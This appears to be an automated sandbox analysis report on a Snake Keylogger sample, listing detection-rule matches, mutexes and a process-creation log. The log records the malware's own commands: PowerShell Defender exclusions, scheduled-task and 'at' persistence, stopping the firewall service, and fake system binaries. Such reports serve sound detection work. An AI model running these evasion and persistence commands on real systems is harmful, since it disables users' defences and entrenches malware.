Source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 20250301_173245__p20250301_173245__p.exe .0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: duencaj.exe .55.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HGH9Iq33EZG8dJvbWh.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HGH9Iq33EZG8dJvbWh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HGH9Iq33EZG8dJvbWh.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, AIqgZG0gKMSon9iYZP.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, AIqgZG0gKMSon9iYZP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: svchost.exe, 00000006.00000002.2942686062.000000000042C000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
Source: 20250301_173245__P20250301_173245__P.exe, icsys.icn.exe.0.dr, svchost.exe.5.dr, stsys.exe.6.dr, spoolsv.exe.4.dr, mrsys.exe.4.dr, dUENcAj.exe.1.dr, explorer.exe.2.dr	Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: 20250301_173245__P20250301_173245__P.exe, 00000000.00000002.1687083628.000000000042C000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.1697127577.000000000042C000.00000004.00000001.01000000.00000009.sdmp, spoolsv.exe, 00000005.00000002.1694022770.000000000042C000.00000004.00000001.01000000.0000000F.sdmp, spoolsv.exe, 00000007.00000002.1693929814.000000000042C000.00000004.00000001.01000000.0000000F.sdmp, dUENcAj.exe, 00000037.00000002.1776553481.000000000042C000.00000004.00000001.01000000.00000015.sdmp, icsys.icn.exe, 0000003A.00000002.1776473806.000000000042C000.00000004.00000001.01000000.00000009.sdmp, explorer.exe, 0000003B.00000002.1776368744.000000000042C000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 00000040.00000002.1801097680.000000000042C000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: l`P@*\AD:\Code\Explorer\Explorer.vbp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@252/41@28/8

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

File created: C:\Users\user\AppData\Local\icsys.icn.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Mutant created: \Sessions\1\BaseNamedObjects\xXTZvx
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System\explorer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA147672CEABCC202.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe
Source: unknown	Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe

Source: 20250301_173245__P20250301_173245__P.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.81%

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 20250301_173245__P20250301_173245__P.exe	Virustotal: Detection: 90%
Source: 20250301_173245__P20250301_173245__P.exe	ReversingLabs: Detection: 92%

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

File read: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe "C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe"
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\System\spoolsv.exe	Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp"
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start Schedule
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dUENcAj.exe C:\Users\user\AppData\Roaming\dUENcAj.exe
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe c:\users\user\appdata\roaming\duencaj.exe
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "
Source: unknown	Process created: C:\Windows\System\explorer.exe "C:\windows\system\explorer.exe" RO
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start Schedule
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System\explorer.exe "C:\windows\system\explorer.exe" RO
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
